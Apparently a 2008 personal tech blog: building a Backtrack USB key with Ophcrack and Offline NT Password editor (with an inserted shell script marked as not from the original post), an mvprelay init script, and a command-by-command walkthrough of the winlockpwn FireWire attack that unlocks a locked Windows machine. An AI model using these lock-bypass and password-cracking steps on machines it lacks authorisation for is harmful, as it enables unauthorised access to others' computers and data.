Sunday, August 31, 2008

The Ultimate Hacker Key

The Ultimate Hacker Key (aka who needs a key chain)

While listening to PaulDotCom Security Weekly 114 I "discovered" UNetbootin - Universal Netboot Installer. Paul talked about installing Backtrack 3 on his USB key and how easy UNetbootin was to use. A colleague of mine recently expressed an interest in having Backtrack running on a USB Key so I thought I would take a look.

Installing Backtrack 3

Getting Backtrack installed and ready to boot from USB is so simple using UNetbootin that it almost does not require directions. But here they are:
  1. Go to http://unetbootin.sourceforge.net/
  2. Click Download (for Windows or Linux)
  3. Insert your USB Key
  4. Run UNetBootin
  5. Select BackTrack from the Distribution Download
  6. The Version populates automatically
  7. Select the drive that is your USB key (hint: it is probably not C:\)
  8. Click Okay
  9. Wait
  10. Reboot and if USB is a boot option the Backtrack menu should appear

So who needs a Key Chain

On several PaulDotCom Security Weekly podcasts, Larry referenced and described his key chain. It has some pretty cool things, but who needs a key chain when you have an 8 GB Kingston USB key ($19.99 CDN at FutureShop last week)? It got me thinking whether I could get all those things on one device.

First up - Ophcrack

Ophcrack is a free Windows password cracker based on rainbow tables. So, let's get it installed:
  1. Plug in the USB Key
  2. Download the ophcrack LiveCD iso from http://ophcrack.sourceforge.net/download.php
  3. Mount the iso image (mount -o loop ophcrack-xp-livecd-2.0.1.iso /mnt/cdrom)
  4. Copy the main directory to the USB key (cp -ra /mnt/cdrom/ophcrack /media/usbkey/)
  5. Copy and rename the boot directory (cp -ra /mnt/cdrom/boot /media/usbkey/bootoph)
  6. umount /mnt/cdrom
  7. Edit the syslinux.cfg from Backtrack 3 (vim /media/usbkey/boot/syslinux/syslinux.cfg)
  8. Comment out any extra Backtrack 3 boot images that you don't plan to use
  9. Add in the boot section from /media/usbkey/bootoph/ophcrack.cfg like:
    LABEL xconf
    MENU LABEL Ophcrack Graphic mode
    KERNEL /bootoph/vmlinuz
    APPEND initrd=/bootoph/initrd.gz ramdisk_size=6666 root=/dev/ram0 rw autoexec=xconf;startx changes=/slax/
  10. Note that the /boot/ references were changed to /bootoph/
  11. Reboot

Second - Offline NT Password & Registry Editor

This is a utility to (re)set the password of any user that has a valid (local) account on your Windows NT/2k/XP/Vista etc system. You do not need to know the old password to set a new one.

This is a very small live CD so putting it on its own USB key seems like a waste.
  1. Download the CD image from http://home.eunet.no/pnordahl/ntpasswd/bootdisk.html
  2. Unzip the zip file to obtain cd080802.iso
  3. Mount the iso file (mount -o loop cd080802.iso /mnt/cdrom)
  4. Create a boot directory called bootnpwd on the USB key (mkdir /media/usbkey/bootnpwd)
  5. Copy all files from the iso to the new directory (cp -ra /mnt/cdrom/* /media/usbkey/bootnpwd)
  6. umount /mnt/cdrom
  7. Edit the syslinux.cfg from Backtrack 3 (vim /media/usbkey/boot/syslinux/syslinux.cfg)
  8. Add in the boot section from /media/usbkey/bootnpwd/syslinux.cfg like:
    LABEL bootnwd
    MENU LABEL Offline NT Password and Registry Editor
    KERNEL /bootnpwd/vmlinuz
    APPEND rw vga=1 initrd=/bootnpwd/initrd.cgz,/bootnpwd/scsi.cgz
  9. Note that the /boot/ references were changed to /bootnpwd/
  10. Reboot
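
The two edits above (Ophcrack and the Offline NT Password editor) are the same operation: copy a live CD's boot directory to a new name, rewrite the /boot/ references in its stanza, and append the stanza to the Backtrack syslinux.cfg. Here is that operation as an added example in POSIX sh (not code from the original post); it assumes the key is mounted at /media/usbkey as in the post, and the function names relocate_stanza, stanza_files_present and add_stanza are my own. The file-existence check is the step worth running before "Reboot", since a stanza pointing at a missing initrd only fails at boot time.

```shell
#!/bin/sh
# Added example (not from the original post): the manual syslinux edits above
# as repeatable functions. Assumes the USB key is mounted at KEY_MOUNT and the
# live-CD stanza has been saved to a file; sample stanzas are constructed below.

# relocate_stanza STANZA_FILE OLD_DIR NEW_DIR
# Prints the stanza with OLD_DIR (e.g. /boot/) replaced by NEW_DIR (e.g. /bootoph/)
# wherever it follows a space, '=' or ',' (KERNEL lines and initrd= lists).
# Unrelated paths such as changes=/slax/ are left alone.
relocate_stanza() {
    src=$1; old=$2; new=$3
    # '#' is the sed delimiter so the slashes in the paths need no escaping
    sed "s#\([[:space:]=,]\)${old}#\1${new}#g" "$src"
}

# stanza_files_present KEY_MOUNT STANZA_FILE
# Collects every path named by KERNEL and by initrd= (comma-separated) and
# checks that each exists under KEY_MOUNT. Returns 0 if all are present,
# 1 if any is missing (each missing path is reported on stderr).
stanza_files_present() {
    mnt=$1; missing=0
    paths=$(awk '
        toupper($1) == "KERNEL" { print $2 }
        { for (i = 2; i <= NF; i++) if ($i ~ /^initrd=/) {
              sub(/^initrd=/, "", $i); n = split($i, a, ",")
              for (j = 1; j <= n; j++) print a[j] } }
    ' "$2")
    for p in $paths; do
        if [ ! -f "$mnt$p" ]; then
            echo "missing: $mnt$p" >&2
            missing=1
        fi
    done
    return $missing
}

# add_stanza KEY_MOUNT STANZA_FILE
# Keeps one backup of the Backtrack syslinux.cfg, then appends the stanza to it.
add_stanza() {
    cfg="$1/boot/syslinux/syslinux.cfg"
    [ -f "$cfg.orig" ] || cp "$cfg" "$cfg.orig"
    { echo; cat "$2"; } >> "$cfg"
}

# Usage on a real key, after copying the live CD's boot dir to /media/usbkey/bootoph:
#   relocate_stanza /media/usbkey/bootoph/ophcrack.cfg /boot/ /bootoph/ > /tmp/oph.cfg
#   stanza_files_present /media/usbkey /tmp/oph.cfg && add_stanza /media/usbkey /tmp/oph.cfg
```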

To Do List
  1. Add extra rainbow tables for Ophcrack
  2. Add Ubuntu or some other general-purpose distro

Notes
  1. For Windows users there are a number of utilities to mount an iso image as a drive. Do a Google search or get a real OS ;-)
  2. The instructions above are from memory and while I have read them several times to remove obvious errors, some may still exist. Leave feedback with corrections but use it as a guide...

Saturday, March 22, 2008

Starting mvprelay via init.d

I have created a script to start and stop mvprelay via the init.d process. The script is for Ubuntu 7.10 - the Gutsy Gibbon.
  1. Download mvprelay_init.tar.gz to /tmp
  2. cd /
  3. sudo tar xvfz /tmp/mvprelay_init.tar.gz
  4. vim /etc/default/mvprelay
    1. Update the MEDIA_SERVER variable with your server's IP address
    2. save the file
  5. sudo update-rc.d mvprelay start 50 2 3 4 5 .
  6. /etc/init.d/mvprelay start
This process should extract the files to the correct locations under /etc (/etc/init.d and /etc/default). The update-rc.d command sets mvprelay to start in runlevels 2, 3, 4 and 5 with priority 50 (which should be after the dhcpd, tftp and mysql servers have started).

I have tested the script: it starts, it stops, it restarts. mvpmc boots up from a cold boot. Other than that it is completely untested, so your results may differ. No warranty provided, but I will help where I can.

Saturday, March 08, 2008

Breaking Windows with Firewire and Ubuntu

Adam Boileau (http://www.storm.net.nz/projects/16) recently released source code for a tool that can unlock a password-locked Windows machine in seconds. While it is quite simple to use, the documentation is not clear on exactly how it is used or how the parts work. I hope this helps:

These instructions are for Ubuntu 7.10 - the Gutsy Gibbon:

First, install the required libraries:
apt-get install libdc1394-13 libraw1394-dev swig
Second, download and install Python 2.3:
wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
tar xvfz Python-2.3.6.tgz
mv Python-2.3.6 python-2.3
cd python-2.3
./configure
make
sudo make install
This will install Python in /usr/local, which means you need to update each script to reference this location.

Third, fix up the libraw1394 header:
vim /usr/local/include/libraw1394/raw1394.h
Search for __attribute__ ((deprecated)); and comment it out, making sure to put a terminating semicolon on the previous line.

Fourth, download the software from http://www.storm.net.nz/projects/16
wget http://www.storm.net.nz/static/files/pythonraw1394-1.0.tar.gz
tar xvfz pythonraw1394-1.0.tar.gz
cd pythonraw1394
wget http://www.storm.net.nz/static/files/winlockpwn
chmod +x ./winlockpwn
vim Makefile (reference /usr/local instead of /usr for python)
make
Fifth, load the module and set some permissions:
sudo modprobe raw1394
sudo chmod 666 /dev/raw1394
Sixth, plug into the Windows machine

Seventh, load the iPod image onto the firewire port:
vim romtool (update the location of python to be /usr/local/bin/python)
./romtool -s 0 ipod.csr
Eighth, run businfo to check the port configurations:
vim businfo (update the location of python to be /usr/local/bin/python)
./businfo
At this point you should see two nodes listed. Node 0 is the iPod image that you loaded with romtool. Node 1 is the Windows machine.

Ninth, run the utility:
vim winlockpwn (update the location of python to be /usr/local/bin/python)
./winlockpwn 0 1 1
You can get more information on the winlockpwn parameters by running the command without parameters. The first parameter is the firewire port, the second is the node (in this case the node for Windows), and the third is the type of Windows password screen.

Tenth, login to Windows

Use any password you want...